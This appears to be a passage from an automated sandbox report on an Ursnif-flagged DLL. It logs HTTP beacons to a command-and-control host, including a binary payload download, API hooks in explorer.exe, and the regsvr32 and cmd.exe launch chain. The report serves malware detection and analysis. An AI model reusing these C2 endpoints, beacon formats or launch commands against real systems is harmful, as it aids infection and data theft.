Jan 26, 2021 19:45:56.869828939 CET	11791	OUT	GET /api1/xN7Vn1nqjV06/Uoae0bry7tu/s480N1RigmgSZ7/ovhVgxM0v2lRZdUdmRPXr/2olZKjleSHMiCKnU/SGGkght_2BNMI_2/BdeG35GUXiZ0jGf3Nd/3Fyunz8gg/k2AMdUoBFgsyj_2BaOEu/BQnpHAOIwtJKSDTYnrI/w6kmi_2BgGuuwzJuTztW0W/4iuVF4d902ob0/E2PA6GSV/Sg1kbgn1io32otLr0SB6JL_/2BZcLfjHz0/pauFVWToc4OpmehUL/g9hTBcF9_2Fd/_2F0_2F2ETj/RAKC8_2FvCntWY/wuqDvU_2FGOflt850WrDr/FxIoV_2BeSB/Suhx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Jan 26, 2021 19:45:57.552026033 CET	11792	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.7	49789	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:57.941216946 CET	11797	OUT	POST /api1/U2cJFG4d72Sw1/coZoTMXb/lP1gviHXrIHWsvunsGl6cnc/P0V_2BL3fj/46b0n6i8fucqBFlqF/hcagnGa1TbpS/dgul3xzYijV/L8f_2B7T21euzh/9_2ByVhlbD4q5WftmVdrM/zBjLhgYQ1PYM0cHh/x5hh2ZDx_2FdFJL/wYla_2Frk0rvM65swQ/cH6PtCte0/lwimgIOiQ_2Fctv6niAP/fIjCPduuWdUdoTOKkQg/18uc85TvLrI_2BdUpjqsJC/iPMSa8oRiSqUF/LVEeH34R/iuq5fk_2BzVlr4Uczzgpoea/kUr98o_2Bs/jBUez8HK/7Gj8QOr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Content-Length: 2 Host: api3.lepini.at
Jan 26, 2021 19:45:57.941226006 CET	11797	OUT	Data Raw: 0d 0a Data Ascii:
Jan 26, 2021 19:45:58.532283068 CET	11797	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 37 30 0d 0a 02 49 d5 c3 cf 4a b6 60 1d 7a 52 f9 f8 87 00 6b 49 45 aa 0c 6a 2d 94 13 51 3e ac ac de 7c 21 8f 21 83 6d 7a e3 df 25 cf cf 9d 9d b3 ed f5 1b 61 b9 e2 a7 dd 4c 42 62 6c 1f 95 95 a2 5d 0c 50 43 24 04 32 7e 49 e4 7c de f1 9f b1 f3 0c 0c 0f b3 28 f9 62 a4 50 bc 21 39 6d 78 16 a0 e5 b0 af f4 55 23 5b 19 31 33 85 b6 21 f7 62 b6 92 56 92 0f 0d 0a 30 0d 0a 0d 0a Data Ascii: 70IJ`zRkIEj-Q>\|!!mz%aLBbl]PC$2~I\|(bP!9mxU#[13!bV0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.7	49790	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:58.647962093 CET	11798	OUT	GET /api1/9Dbk1WvXxj1sVm4yff/nk0pg4b0s/UVCKD_2BMZzstnnqhoFp/Ktn8x0OSRfno2WpW3u_/2FDol0BN3XO12yUJgBMYq6/iZh8WugGdwuvs/RKu1CLXP/1Z9vDFru5BWzbqKhcmT_2BM/Qv0FngLhqs/VDpS5UcoEsg1xls7_/2Bvy4JBL4QLN/K_2FtcmAOUK/sIfXs_2BO6Fp5q/oQH0xXcxqaH_2BOp0CawI/7aZdiKs11SUgIJU0/9Pv802DFLf2Wa7N/6q1aWSf7ymVrIOI4pW/il_2Fb_2F/JAX6Lfr2HK2GkQh4Lani/6J0JJGyWOdnxWHH/ueClpx2 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Jan 26, 2021 19:45:59.113455057 CET	11800	IN	Data Raw: 35 61 72 e4 d0 d4 0d ce 3e dc b9 5d 00 3e d8 59 f0 db 3a da bd 51 92 eb cd 9c fb f6 c3 4c cc c3 41 d6 28 0c f9 e5 e5 5e 82 ad b3 12 2f f3 99 22 cd b1 6a ca 39 6a da ef d1 c2 f6 4d 42 42 63 4b a0 a4 57 c0 3a 27 c3 7f 53 e2 96 a1 63 82 99 46 f2 7d Data Ascii: 5ar>]>Y:QLA(^/"j9jMBBcKW:'ScF}Zqi(17d<rP2H>'^\ycms<m@Mnmh9u0\|Kb+g-? {:d-yj[x4da/<1Hr;DUq@BeHZ8Fh
Jan 26, 2021 19:45:59.113837957 CET	11801	IN	Data Raw: 7b a3 7c 3b dc 5d 99 59 7c 7c 6c 8b 80 79 fc fc 88 2a 7d 83 7f 0d a2 15 3d 6d 80 42 4a 17 f0 ee 1b d1 dd a6 81 ac fc dd 72 50 b6 0f b1 d9 dd 82 18 2f a6 4f 69 9b b6 c9 58 19 ba ba bf 26 9e a2 6f 90 33 ff 48 dc 0a f4 ed 44 97 90 58 d1 b2 fd 1f c9 Data Ascii: {\|;]Y\|\|ly*}=mBJrP/OiX&o3HDXUQ]T}k- bmW\emKAI\qQxXM"wM3HMw>?\+Vs_l3}k%^l'4>E7KK.-{xK}su2
Jan 26, 2021 19:45:59.114273071 CET	11802	IN	Data Raw: 5e 6a 00 c3 01 54 75 46 01 15 a8 5a 8b 04 d5 30 fe dd 01 f2 2c ea ba f1 bf 8b 7e a1 f3 4e 34 d8 56 e9 2c 7e a7 51 c6 98 17 7a 1a f1 7d 0c e9 a5 0f bc ff 06 37 bd 85 39 b2 be 24 fa 58 a6 bf 97 e7 00 be 97 a7 a6 03 67 82 fc 2c 6e b8 54 8f 9b ae 7b Data Ascii: ^jTuFZ0,~N4V,~Qz}79$Xg,nT{y7,Ovh<@#%^8GeU]Dr]$P#+b!OwF-P8o ,T%Em4_RCWfVWDC.[fWQ"2
Jan 26, 2021 19:45:59.114752054 CET	11804	IN	Data Raw: e6 f6 d2 d5 e2 12 cc a7 a4 a7 aa ea 57 60 7c 86 af 12 4e 06 bd ee 39 7a f4 8f 3e d2 10 82 fb c3 16 7f 5a 4a 1f 65 8e 4a 2f 2a 60 5e c7 c1 ad 2f d9 83 c3 8b f5 60 a1 95 ca 87 f2 d7 6b e2 13 56 9e 8b 81 24 ef 9b c1 65 c9 ec 0a d1 91 19 91 e6 17 c3 Data Ascii: W`\|N9z>ZJeJ/`^/`kV$e9K{Vy`Y#gvk)Y"o.8x&53WfpO8Z5J$v*6AaCb)mt9JD(#M66#wv;{c{m^1,yS^J5X{h
Jan 26, 2021 19:45:59.115255117 CET	11805	IN	Data Raw: c5 76 fc 7a 26 8a 27 3c da ea c9 59 5a ad 02 39 3e 0d 68 84 7a 01 c4 4e 3c 37 8a 14 c7 75 f1 8d 10 81 f4 93 9a b6 e8 3d ac 35 f5 fc a2 e8 7e ed 5f 32 76 bd 41 50 dd b6 09 d1 66 c7 55 2e f4 92 32 8c d1 61 79 76 ba 28 42 bf 64 5e 25 b2 8a 9b 23 1b Data Ascii: vz&'<YZ9>hzN<7u=5~_2vAPfU.2ayv(Bd^%#Ud6{;bp5Pa!u1Xj0t"Ulp3JjGvzMq?:ocuI~=z;CXjR-_Zw&Ni8/EgBzMSzPrtB+/@aW
Jan 26, 2021 19:45:59.224519014 CET	11806	IN	Data Raw: de 06 d0 8b f5 c0 be 02 ce 2c 72 04 35 04 65 9e 44 f8 03 24 22 c8 eb 71 c0 f3 0a 25 ef 33 26 ad c5 c4 7f f8 5a b6 95 9b 6b 46 bc dd 44 16 f1 98 ff 21 a1 c8 95 1a ce 77 7c 5a 15 64 63 b6 94 f0 19 93 cb a8 2d 3b e4 38 ef 82 63 21 09 7b bc 71 5d 14 Data Ascii: ,r5eD$"q%3&ZkFD!w\|Zdc-;8c!{q]KU6n@9?e\|,:2[%SgkiPm!yLhZD+\|P/N9\975A&NSS"j,R2E.,P&)AW!u0ovlm
Jan 26, 2021 19:45:59.274738073 CET	11808	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:59 GMT Content-Type: application/octet-stream Content-Length: 138816 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="60106367039b0.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 36 08 99 f8 4b b3 bd 5f 03 93 a2 a0 2f c3 4b d0 00 75 08 b5 ad a3 c7 98 73 a0 9c df a3 23 30 54 88 0d 65 49 4a 27 14 6f a2 99 fd ff 75 20 9f c2 08 d0 f2 5e 56 4b 12 00 23 b2 48 ac a1 82 6e b4 1d 29 17 f3 82 3d f8 e5 48 85 46 97 86 c5 9b 17 19 83 98 1d fc ff 66 15 97 52 d1 95 7b 47 94 b5 29 6c d3 87 0a 10 2b da 43 32 51 d6 3e 4c 3b f6 57 16 4c 40 e4 cc 4e 6d 16 73 33 c7 9b cf 19 30 50 12 bd a7 73 c7 1d 99 f2 be 18 b8 e8 d1 5a d7 26 0e 11 e7 11 65 d2 53 e1 86 71 e2 08 70 42 78 87 a6 11 15 e5 18 43 e1 51 5d f4 75 8d d5 12 4b 68 69 91 61 f0 9c 9a b5 e9 42 5f 1a e6 87 35 70 bd e8 12 5e 5a 3b 1e 66 0b 02 e6 df 25 9d 5e 0a ec 39 b2 95 65 d5 b6 99 fa 00 a9 d3 97 12 a4 8f fd e6 4e 5e dc 35 73 f6 b7 c7 6f 76 f6 73 c3 d6 62 33 f7 98 65 7b 14 2d aa b5 6b 33 58 e1 60 f1 9f b4 65 85 7e cf b5 05 43 ea 42 57 66 90 3b ef a5 ca 66 de a4 be 2a 27 8c 5a 7f 7b 0f 88 b9 cd 28 21 79 57 89 e2 b6 4c 03 4f 50 37 0e b5 6f 1e fa d4 c5 2a 81 28 3a b0 2d 95 a1 ea 45 00 81 fd b5 fe 0b aa a9 1c a3 c6 65 5f 2e e3 1b a4 18 eb 37 77 0c c9 79 b6 65 4a 1b 48 07 25 ba 62 74 62 00 2f b2 65 d2 00 bd 49 3e fb 4c 72 06 19 2e aa 9c c7 fa 48 03 81 72 12 4c d2 db d3 4a f6 74 db 01 09 51 62 39 cb d5 9f 49 f7 c2 cf 47 5b 65 06 48 ce 55 33 0c 69 88 4a 43 49 e9 9e 12 90 59 71 8b 4b ca d1 2b 1b dd 83 49 e8 77 4f 5f 1c dc be 77 34 9b 22 65 21 55 d3 4a aa 96 f0 5e 3a 83 43 68 ba a3 1a 07 58 86 13 7d 77 3b fd 34 b4 e7 c0 d8 c3 1b 8c 0a cb f5 c4 2e 21 6a 66 6b 9b 21 fa 39 68 dd 8e bc 2d 47 61 b4 1c 90 18 42 bd be 3a 91 7d 5c 29 af 10 89 e2 88 0c 83 8a d9 54 08 9b fc 06 06 09 d4 9c 2d c4 18 a9 83 5e 8b e1 76 17 03 f4 23 07 1b 67 06 c1 26 72 d3 f5 90 6d c5 65 f4 7a e1 5f 1a 7e 76 c1 b4 49 6c 20 c4 77 9f 53 73 ba 94 f3 5e 87 3e 4f 29 62 08 b1 71 e3 c6 c2 2c f0 0a 98 89 48 72 84 4b 49 d0 40 be 01 63 28 b8 29 8f b5 52 f7 24 72 8f 28 c2 c7 55 b4 9a de 8c 0f f7 19 4a 97 b4 5a 36 95 be 30 6f 84 e4 92 75 b0 5c 8e 3a c9 2a 4a 5a aa 41 6e 1f 33 78 ba 5f 4a 65 d4 45 7f e1 fd 31 ac 87 2d 6b f5 ba 7d 27 d0 2b 94 f6 fe 46 53 be bb f0 4a 62 d0 aa 4a 7f 14 bb 8e 1c d4 ed 39 0c 8a 4d f6 3b 8d fa d9 1d 6f c1 25 d8 17 55 77 d5 1f db bf 18 b7 7c a4 83 77 8f 33 19 d9 b1 55 cc 58 b2 99 39 8c b6 31 9f b4 79 d8 b6 b7 d8 4d cf b6 7c b6 a4 d6 5f 86 dd 16 55 66 0c ae 5d e2 88 98 56 de 11 bc 96 56 51 ab 42 63 e8 a0 bc 76 6f c6 c2 43 2d c7 f6 1d d0 39 02 43 50 61 32 4b 30 08 ce 44 e7 01 20 cc a7 81 99 39 f5 4a 48 74 94 8b 9c cb 5e ac bb 96 13 50 4b ac db 1a f4 7a 7f 2a 72 1a 4d 88 1a 3e b8 5e f5 f1 e2 b8 d4 c5 2b 47 94 33 cf e9 55 ac 64 7a 49 6e 04 3a fb f2 c0 c8 b2 8e 6a bc a1 37 16 44 df 4b c4 64 8c 92 81 20 df 01 ef 51 23 4b 83 bd e0 50 ce 05 f5 02 57 50 54 94 cb a9 1a 81 02 92 ef 5f bd dd 82 a5 5a e3 8e ce 4f 8c 45 86 24 bd c3 bf 44 b3 c1 a2 84 55 6b 59 e9 0b 01 33 cc fa 01 Data Ascii: 6K_/Kus#0TeIJ'ou ^VK#Hn)=HFfR{G)l+C2Q>L;WL@Nms30PsZ&eSqpBxCQ]uKhiaB_5p^Z;f%^9eN^5sovsb3e{-k3X`e~CBWf;f'Z{(!yWLOP7o(:-Ee_.7wyeJH%btb/eI>Lr.HrLJtQb9IG[eHU3iJCIYqK+IwO_w4"e!UJ^:ChX}w;4.!jfk!9h-GaB:}\)T-^v#g&rmez_~vIl wSs^>O)bq,HrKI@c()R$r(UJZ60ou\:JZAn3x_JeE1-k}'+FSJbJ9M;o%Uw\|w3UX91yM\|_Uf]VVQBcvoC-9CPa2K0D 9JHt^PKzrM>^+G3UdzIn:j7DKd Q#KPWPT_ZOE$DUkY3
Jan 26, 2021 19:45:59.323968887 CET	11809	IN	Data Raw: 5f 56 cc 28 92 5b f6 4d f3 37 c2 c9 b3 0e 62 a6 4f 14 9e fd c8 3d 39 ab 15 8f cd e2 a1 cf af f0 90 5d 28 5b 0d ab 87 f7 93 f1 89 17 02 cf d8 82 02 53 71 cb de 1b b4 a7 61 f4 e0 06 0a 18 e7 13 fd fa 30 be c6 fa 0b d4 eb a5 73 f0 3b 6c 6c 94 92 d6 Data Ascii: _V([M7bO=9]([Sqa0s;ll-C6nAe< ,`~O>R'4'@5ar>]>Y:QLA(^/"j9jMBBcKW:'ScF}Zqi(17d<rP2H>'^\yc
Jan 26, 2021 19:45:59.324174881 CET	11811	IN	Data Raw: d5 3a 64 57 9b 1f 25 5b ec 38 c1 39 b5 38 3e d6 2c d4 ab 9b a4 cb e8 07 cc ec c9 24 bc 4d 60 4e 22 3c 4c 52 2b f2 45 e6 19 b3 a1 a5 ff b8 a3 38 c7 31 40 50 5f 7d 9c 05 f5 4c ac 31 4e 4d ae 57 b6 71 24 fd a7 a2 42 64 ab d7 4b 0c e2 bc 9c fa b8 4e Data Ascii: :dW%[898>,$M`N"<LR+E81@P_}L1NMWq$BdKNCBb_Wh77}e64isH'vmM'ErvL<Ayn,F{jx$bl*I.#Hz5lGX4!>ZT\v`Y4
Jan 26, 2021 19:45:59.373321056 CET	11812	IN	Data Raw: 41 97 06 c3 94 9f b2 97 fd 12 1b 1c d9 8c e4 58 8a 7c ee b5 33 11 0a 57 4a 02 03 91 b7 d1 97 2a 90 d6 a1 85 88 5b 91 b6 40 ac 38 3a ce ec 97 cb 7b a2 ab 53 3e 2d 0f c4 cc d2 53 d6 63 87 df d5 29 9b 99 4f 28 b4 60 ab b5 25 e3 a7 53 0a 79 de fa 57 Data Ascii: AX\|3WJ[@8:{S>-Sc)O(`%SyWU#qqFz;;O"FhY_`J(ghM{\|;]Y\|\|ly}=mBJrP/OiX&o3HDXUQ]T}k- bmW\e
Jan 26, 2021 19:45:59.373562098 CET	11814	IN	Data Raw: 5e 6a 00 c3 01 54 75 46 01 15 a8 5a 8b 04 d5 30 fe dd 01 f2 2c ea ba f1 bf 8b 7e a1 f3 4e 34 d8 56 e9 2c 7e a7 51 c6 98 17 7a 1a f1 7d 0c e9 a5 0f bc ff 06 37 bd 85 39 b2 be 24 fa 58 a6 bf 97 e7 00 be 97 a7 a6 03 67 82 fc 2c 6e b8 54 8f 9b ae 7b Data Ascii: ^jTuFZ0,~N4V,~Qz}79$Xg,nT{y7,Ovh<@#%^8GeU]Dr]$P#+b!OwF-P8o ,T%Em4_RCWfVWDC.[fWQ"2

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 26, 2021 19:44:17.551697969 CET	151.101.1.44	443	192.168.2.7	49738	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.551697969 CET	151.101.1.44	443	192.168.2.7	49738	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.560354948 CET	151.101.1.44	443	192.168.2.7	49739	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.560354948 CET	151.101.1.44	443	192.168.2.7	49739	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.562694073 CET	151.101.1.44	443	192.168.2.7	49743	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.562694073 CET	151.101.1.44	443	192.168.2.7	49743	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.563131094 CET	151.101.1.44	443	192.168.2.7	49741	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.563131094 CET	151.101.1.44	443	192.168.2.7	49741	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.563146114 CET	151.101.1.44	443	192.168.2.7	49742	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.563146114 CET	151.101.1.44	443	192.168.2.7	49742	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.565854073 CET	151.101.1.44	443	192.168.2.7	49740	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.565854073 CET	151.101.1.44	443	192.168.2.7	49740	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFFAC2D5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5B9C590

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFFAC2D521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFFAC2D5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFFAC2D520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFFAC2D5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5B9C590

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 1892 Parent PID: 5636

General

Start time:	19:44:08
Start date:	26/01/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\sup11_dump.dll'
Imagebase:	0x10000
File size:	120832 bytes
MD5 hash:	2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 4496 Parent PID: 1892

General

Start time:	19:44:08
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\sup11_dump.dll
Imagebase:	0x930000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5712 Parent PID: 1892

General

Start time:	19:44:09
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0x870000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3104 Parent PID: 5712

General

Start time:	19:44:09
Start date:	26/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff724940000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6160 Parent PID: 3104

General

Start time:	19:44:10
Start date:	26/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17410 /prefetch:2
